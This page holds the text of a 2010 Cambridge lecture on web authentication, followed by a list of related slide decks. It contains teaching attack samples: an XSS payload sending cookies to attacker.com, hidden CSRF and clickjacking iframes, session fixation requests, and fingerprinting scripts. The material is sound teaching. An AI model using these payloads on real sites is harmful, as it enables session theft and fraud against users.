user authentication on the web
play

User authentication on the web Joseph Bonneau jcb82@cl.cam.ac.uk - PowerPoint PPT Presentation

Mar 27, 2024 •331 likes •1.73k views

User authentication on the web Joseph Bonneau jcb82@cl.cam.ac.uk Computer Laboratory Part II Security lecture November 17, 2010 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 1 / 42 Talk outline What are we

  1. Cookie stealing via cross-site scripting Your submission will reference:<br/> http:www.espn.com/college-football http://dynamic.espn.go.com/bugs? url=http:www.espn.com/college-football J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 16 / 42

  2. Cookie stealing via cross-site scripting Your submission will reference:<br/> <script> document.location = "http://www.attacker.com/cookie-log.cgi?" + document.cookie </script> http://dynamic.espn.go.com/bugs? url=%3Cscript%3E%0Adocument.location +%3D%0A%22http%3A//www.attacker.com/cookie- log.cgi%3F%22%0A%2B+document.cookie%0A%3C/script%3E J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 16 / 42

  3. Session fixation SID UID Other data b3e9... rja14 ... Server memory GET / HTTP/1.1 Host: www.example.com 128.28.2.138 − → www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  4. Session fixation SID UID Other data b3e9... rja14 ... da4b... ... ∅ Server memory HTTP/1.1 200 OK Content length: 7661 Content-Type: text/html Set-Cookie: SID=da4b... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 ... 128.28.2.138 ← − www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  5. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... Server memory POST login.cgi HTTP/1.1 Host: www.example.com Content-Type: application/ x-www-form-urlencoded Cookie: SID=da4b... Content-Length: 32 user=mgk25&pass=i_love_fourier 128.28.2.138 − → www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  6. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... ∅ ... Server memory HTTP/1.1 200 OK Content length: 7661 Content-Type: text/html Set-Cookie: SID=33c4... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 ... attacker ← − www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  7. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... ∅ ... Server memory Hey man! Check this video out: http://www.example.com/?SID=33c4... attacker − → jcb82@cl.cam.ac.uk J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  8. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... ∅ ... Server memory GET /?SID=33c4... HTTP/1.1 Host: www.example.com 128.28.2.138 − → www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  9. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... ∅ ... Server memory HTTP/1.1 200 OK Content length: 7661 Content-Type: text/html Set-Cookie: SID=33c4... <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 ... 128.28.2.138 ← − www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  10. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... jcb82 ... Server memory POST login.cgi HTTP/1.1 Host: www.example.com Content-Type: application/ x-www-form-urlencoded Cookie: SID=33c4... Content-Length: 22 user=jcb82&pass=qwerty 128.28.2.138 − → www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  11. Session fixation SID UID Other data b3e9... rja14 ... da4b... mgk25 ... 33c4... jcb82 ... Server memory POST transfer_money.cgi HTTP/1.1 Host: bank.example.com Content-Type: application/ x-www-form-urlencoded Cookie: SID=33c4... Content-Length: 22 transfer_amount=10000&transfer_target=attacker attacker − → www.example.com J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 17 / 42

  12. Weak cookies SID UID Other data 3943412586 rja14 ... 3943412587 mgk25 ... 3943412588 jcb82 ... ... ... ... Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  13. Weak cookies SID UID Other data 2010-11-15T12:06:43 rja14 ... 2010-11-15T12:07:38 mgk25 ... 2010-11-15T12:08:11 jcb82 ... ... ... ... Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  14. Weak cookies SID UID Other data H (2010-11-15T12:06:43) rja14 ... H (2010-11-15T12:07:38) mgk25 ... H (2010-11-15T12:08:11) jcb82 ... ... ... ... Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  15. Weak cookies COOKIE i = i || crypt ( i || K daily ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  16. Weak cookies COOKIE i = i || crypt ( i || K daily ) COOKIE jbonneau = jbonneau7c19f550a775b614 COOKIE jbonneau1 = jbonneau17c19f550a775b614 Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  17. Weak cookies COOKIE i = i || crypt ( i || K daily ) COOKIE jbonnea = jbonneac6ceb34c403d1f6d COOKIE jbonneaN = jbonneaNc6ceb34c403d1f6d COOKIE j = j938c00d2f12c73a4 COOKIE jNov201999 jNov201999938c00d2f12c73a4 = Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  18. Weak cookies COOKIE i = i || t || MAC k ( i || t ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  19. Weak cookies COOKIE i = i || t || MAC k ( i || t ) COOKIE jcb82 ( 1-Dec-2010 ) = jcb821-Dec-20105ca57512f4db8fd18254adce9b8ef438 = COOKIE jcb8 ( 21-Dec-2010 ) Predictable session identifiers Misuse of cryptography Improper field delimitation Fu et al., 2001 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 18 / 42

  20. Cross-site request forgery <iframe name="csrf" width="0" height="0" frameborder="0" src="http://bank.example.com/transfer? &amount=1000000&to=attacker"> </iframe> J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 19 / 42

  21. Cross-site request forgery <iframe name="csrf" width="0" height="0" frameborder="0" src="http://twitter.com/share/update? status=i%20got%20pwned"> </iframe> J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 19 / 42

  22. Clickjacking http://www.facebook.com/connect/uiserver.php?app_id=102452128776 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 20 / 42

  23. Clickjacking <iframe name="csrf" width="0" height="0" frameborder="0" src="http://www.facebook.com/connect/ uiserver.php?app_id=102452128776" style="opacity: 0; filter: alpha(opacity=0); position: absolute;top: -170px;left: -418px;"> </iframe> <img src="clickjacking_bait.jpg"> J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 20 / 42

  24. Clickjacking J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 20 / 42

  25. Clickjacking J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 20 / 42

  26. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 21 / 42

  27. No trusted path between users and browser (a) Hand tracking analysis. Rectangles identify regions in movement. Black rectangles are used for movements in the hands regions, grey rectangles for keys, white rectangles for regions where both hand and key movement happens. These rectangles identify likely key pressings. (b) Key pressing analysis. Using occlusion-based techniques, the analysis determines keys that are not pressed, which are represented by the dark polygons. Balzarotti et al. 2008 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 22 / 42

  28. No trusted path between users and browser Hardware keylogger, US$36 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 22 / 42

  29. No trusted path between users and browser Software keylogger, US$49.50 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 22 / 42

  30. No trusted path between users and browser Phishing (Firefox) J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 22 / 42

  31. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 23 / 42

  32. Brute-force attacks 123456 12345 123456789 password iloveyou princess 1234567 rockyou 12345678 abc123 nicole daniel babygirl monkey lovely jessica 654321 michael J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  33. Brute-force attacks Rate limiting (Truthdig) J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  34. Brute-force attacks Forced reset (Cafe Press) J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  35. Brute-force attacks CAPTCHA restrictions (Wikipedia) J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  36. Brute-force attacks countermeasure I E C Tot. CAPTCHA 0.07 0.01 0.01 0.09 timeout 0.01 0.01 0.01 0.03 reset 0.01 0.02 0.01 0.03 none 0.25 0.29 0.31 0.84 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  37. Brute-force attacks limit I E C Tot. 3 0.02 0.00 0.00 0.02 4 0.01 0.01 0.00 0.01 5 0.02 0.01 0.03 0.06 6 0.01 0.01 0.00 0.03 7 0.01 0.00 0.00 0.01 10 0.01 0.00 0.00 0.01 15 0.01 0.00 0.00 0.01 20 0.00 0.01 0.00 0.01 25 0.01 0.00 0.00 0.01 > 100 0.25 0.29 0.31 0.84 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  38. Brute-force attacks 40 35 30 µ α marginal guesswork ˜ 25 Password [RockYou] Password [Klein] 20 Password [Spafford] Password [Schneier] 15 10 5 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 24 / 42

  39. Personal knowledge questions J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 25 / 42

  40. Personal knowledge questions Web search Used against Sarah Palin in 2008 Public records Griffith et. al: 30% of individual’s mother’s maiden names Social engineering Dumpster diving, burglary Acquaintance attacks Schecter et. al: ∼ 25% of questions guessed by friends, family J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 25 / 42

  41. Personal knowledge questions 70% of answers are proper names (Just et al. 2008) 25% surname 10% forename 15% pet name 20% place name Most others are trivially insecure What is my favourite colour? What is the worst day of the week? J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 25 / 42

  42. Personal knowledge questions 40 35 30 Forename µ α marginal guesswork ˜ 25 Surname Password [RockYou] 20 Password [Klein] Password [Spafford] 15 Password [Schneier] 10 5 0 0 . 0 0 . 2 0 . 4 0 . 6 0 . 8 1 . 0 success rate α Personal knowledge worse than passwords (Bonneau et al. 2010) J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 25 / 42

  43. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 26 / 42

  44. Systemic trends in web authentication 1 . 0 0 . 8 Proportion of sites collecting passwords 0 . 6 0 . 4 0 . 2 0 . 0 0 100 200 300 400 500 Traffic rank All sites collect passwords All sites utilise email infrastructure Naming Liveness checks Password recovery J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 27 / 42

  45. Systemic trends in web authentication All sites collect passwords All sites utilise email infrastructure Naming Liveness checks Password recovery J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 27 / 42

  46. Economic models Password over-collection is a tragedy of the commons Password insecurity is a negative externality J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 28 / 42

  47. Economic models Password over-collection is a tragedy of the commons Password insecurity is a negative externality J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 28 / 42

  48. Consequences 1 . 0 0 . 8 Proportion of sites collecting passwords 0 . 6 0 . 4 0 . 2 0 . 0 0 100 200 300 400 500 Traffic rank Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 29 / 42

  49. Consequences 10 password score page views per million 0 1E-2 1E-1 1E+0 1E+1 1E+2 1E+3 1E+4 1E+5 E-commerce News/Customization User interaction Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 29 / 42

  50. Consequences Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 29 / 42

  51. Consequences Users overwhelmed by password burden Average person has > 25 accounts (Flôrencio et al., 2007) Users forced to re-use passwords across security contexts Cross-site password compromise increasing Email accounts becoming powerful credentials J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 29 / 42

  52. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Technical failures (false authentication) 1 User interface failures 2 Human memory failures 3 Economic failures 4 Technical failures (unintended authentication) 5 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 30 / 42

  53. Implicit identifiers SRC: 128.232.8.168 DST: 128.232.0.20 ... IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  54. Implicit identifiers GET / HTTP/1.1 Host: www.cl.cam.ac.uk User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12 Accept: text/html, application/xhtml+xml, application/xml; q=0.9,*/* Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*; IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  55. Implicit identifiers GET / HTTP/1.1 Host: www.cl.cam.ac.uk Referer: http://www.bing.com/search? q=what%27s+the+best+university IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  56. Implicit identifiers GET / HTTP/1.1 Host: www.cl.cam.ac.uk Referer: http://www.facebook.com/profile.php? id=1511359465 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  57. Implicit identifiers //detect screen resolution x = screen.width; y = screen.height; //detect plugins q = navigator.mimeTypes["video/quicktime"]; j = navigator.javaEnabled(); //detect time zone tz = (new Date()).getTimezoneOffset(); IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  58. Implicit identifiers IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  59. Implicit identifiers # Send users to my detector... <iframe name="detector" width="0" height="0" frameborder="0" src="https://docs.google.com/document/d/ 1TUV9x1lFAQcVWvhP4EAHQZIPrVmo3_vrz5Sz8Wo"> </iframe> Narayanan 2009 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  60. Implicit identifiers Narayanan 2009 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  61. Implicit identifiers <img id="test" style="display:none"> <script> test = document.getElementById(’test’); var start = new Date(); test.onerror = function() { time = new Date() - start;} test.src = "http://www.example.com/"; </script> Bortz et al. 2007 IP address 1 HTTP headers 2 HTTP referer 3 Javascript runtime (also Flash, Java, Silverlight ...) 4 Cross-site de-anonymisation 5 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 31 / 42

  62. Talk outline What are we trying to achieve? 1 What’s done in practice 2 What goes wrong 3 Can we do better? 4 J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 32 / 42

  63. Password alternatives Mitigates: Guessing attacks, phishing?, malware J. Bonneau (U. of Cambridge) User authentication on the web November 17, 2010 33 / 42

Recommend

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR

Django User Authentication OVERVIEW OF USER AUTHENTICATION Anthony Alampi OWNER, X FACTOR CONSULTANTS www.XFactorConsultants.com User Authentication (Auth) The methods by which a web app verifies the identity of a user and limits their

334 views • 8 slides
Information Security Identification and authentication Advanced User Authentication I 2019-02-01

Information Security Identification and authentication Advanced User Authentication I 2019-02-01

Information Security Identification and authentication Advanced User Authentication I 2019-02-01 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

573 views • 32 slides
Information Security Identification and authentication Advanced User Authentication I 2018-02-02

Information Security Identification and authentication Advanced User Authentication I 2018-02-02

Information Security Identification and authentication Advanced User Authentication I 2018-02-02 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

568 views • 41 slides
Information Security Identification and authentication Advanced User Authentication I 2016-01-26

Information Security Identification and authentication Advanced User Authentication I 2016-01-26

Information Security Identification and authentication Advanced User Authentication I 2016-01-26 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for this part of the course Background Statistics in user authentication Biometric systems

865 views • 40 slides
User Authentication Passport Jason Situ Passport What is it? Passport is authentication

User Authentication Passport Jason Situ Passport What is it? Passport is authentication

User Authentication Passport Jason Situ Passport What is it? Passport is authentication middleware for Node. It is designed to serve a singular purpose: authenticate requests. Supports a comprehensive set of authentication mechanisms called

808 views • 16 slides
USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we

USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we

USABLE SECURITY GRAD SEC SEP 28 2017 USER AUTHENTICATION What we know (passwords) What we have (tokens) What we are (iris, fingerprint) [Accuracy vs. cost trade-off] Other USER AUTHENTICATION INKBLOT AUTHENTICATION Come up with

671 views • 20 slides
Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II 2016-01-29 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background Authentication eID

683 views • 44 slides
Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II

Information Security Identification and authentication Advanced User Authentication II 2019-02-08 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background Authentication eID

1.19k views • 102 slides
Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this

Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this

5/25/2019 Network Security Topic 3: User Authentication Topic 3: User Authentication 1 Reading for this Lecture 5/25/2019 Password Topic 3: User Authentication Password strength Salt_(cryptography) Password cracking

1.03k views • 75 slides
Information Security Identification and authentication Advanced User Authentication III

Information Security Identification and authentication Advanced User Authentication III

Information Security Identification and authentication Advanced User Authentication III 2016-02-02 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture II within this part of the course Background Statistics Statistics in user

1.49k views • 70 slides
User authentication on the web Joseph Bonneau

User authentication on the web Joseph Bonneau

User authentication on the web Joseph Bonneau Computer Laboratory Part II Security lecture 2012 J. Bonneau (U. of Cambridge) User authentication on the web February 22, 2012 1 / 41

1.72k views • 132 slides
Information Security Identification and authentication Advanced User Authentication II and III

Information Security Identification and authentication Advanced User Authentication II and III

Information Security Identification and authentication Advanced User Authentication II and III (somewhat abbreviated ) 2018-02-09 Amund Hunstad Guest Lecturer, amund@foi.se Agenda for lecture I within this part of the course Background

1.24k views • 106 slides
User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens

ITS335 User Authentication Authentication Passwords User Authentication Storing Passwords Selecting Passwords ITS335: IT Security Tokens Biometrics Sirindhorn International Institute of Technology Summary Thammasat University Prepared

663 views • 40 slides
TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication

TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication

TLS 1.3 Client Authentication Andrei Popov, Microsoft Corp. Issue 1: TLS Client Authentication After the Handshake The user navigates to the sites landing page, no client authentication required. Eventually, the user requests a

69 views • 6 slides
ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User

ISE 331 Fundamentals of Computer Security Authentication and Attacks Agenda User Authentication Authentication process Means of authentication Passwords Vulnerabilities of passwords Password Cracking Dictionary Attacks

472 views • 21 slides
Authentication Authentication Overview Registration User sends username and password

Authentication Authentication Overview Registration User sends username and password

Authentication Authentication Overview Registration User sends username and password Validate password strength Store salted hash of the password Authentication User sends username/password Retrieve the stored salted

359 views • 20 slides
A2: Broken Authentication and Session Management But first Authentication, Authorization,

A2: Broken Authentication and Session Management But first Authentication, Authorization,

A2: Broken Authentication and Session Management But first Authentication, Authorization, Sessions Authentication Determining user identity Multiple ways What you know (password) What you have (phone, RSA SecureID, Yubikey)

1.57k views • 28 slides
Challenge/Response Authentication Authentication by what questions you can answer correctly

Challenge/Response Authentication Authentication by what questions you can answer correctly

Challenge/Response Authentication Authentication by what questions you can answer correctly Again, by what you know The system asks the user to provide some information If its provided correctly, the user is authenticated

233 views • 20 slides
Integrating Legacy User Authentication with HIP Jani Hautakorpi (Jani.Hautakorpi@hut.fi) 1 / 11

Integrating Legacy User Authentication with HIP Jani Hautakorpi (Jani.Hautakorpi@hut.fi) 1 / 11

T-110.557 Research Seminar on Telecommunications Software Integrating Legacy User Authentication with HIP Jani Hautakorpi (Jani.Hautakorpi@hut.fi) 1 / 11 Contents HIP base exchange Selected legacy user authentication mechanisms:

241 views • 11 slides
Computer and Information Security Fall 2020 User Authentication and Access Control Tyler Bletsch

Computer and Information Security Fall 2020 User Authentication and Access Control Tyler Bletsch

ECE560 Computer and Information Security Fall 2020 User Authentication and Access Control Tyler Bletsch Duke University User Authentication Determining if a user is who they say they are before giving them access. 2 The four means of

1.15k views • 70 slides
ECE590 Computer and Information Security Fall 2018 User Authentication and Access Control Tyler

ECE590 Computer and Information Security Fall 2018 User Authentication and Access Control Tyler

ECE590 Computer and Information Security Fall 2018 User Authentication and Access Control Tyler Bletsch Duke University User Authentication Determining if a user is who they say they are before giving them access. 2 The four means of

1.24k views • 66 slides
Computer and Information Security Fall 2019 User Authentication and Access Control Tyler Bletsch

Computer and Information Security Fall 2019 User Authentication and Access Control Tyler Bletsch

ECE590 Computer and Information Security Fall 2019 User Authentication and Access Control Tyler Bletsch Duke University User Authentication Determining if a user is who they say they are before giving them access. 2 The four means of

1.02k views • 70 slides
Two factor authentication Open, trustworthy and enterprise ready Two factor authentication

Two factor authentication Open, trustworthy and enterprise ready Two factor authentication

Version 1.0 Cornelius Klbel (corny@cornelinux.de) May 2014 (CC BY-NC-SA 4.0) Everybody knows that a password - be it simple or even complex - is a potential vulnerability. Two factor authentication is the way to authenticate a user not only

400 views • 5 slides
Users and security Authentication Making sure a user is who they say they are ...on

Users and security Authentication Making sure a user is who they say they are ...on

Users and security Authentication Making sure a user is who they say they are ...on every request! Authorization Making sure a user can only get to information they are supposed to see Making sure a user can only perform

801 views • 30 slides

More recommend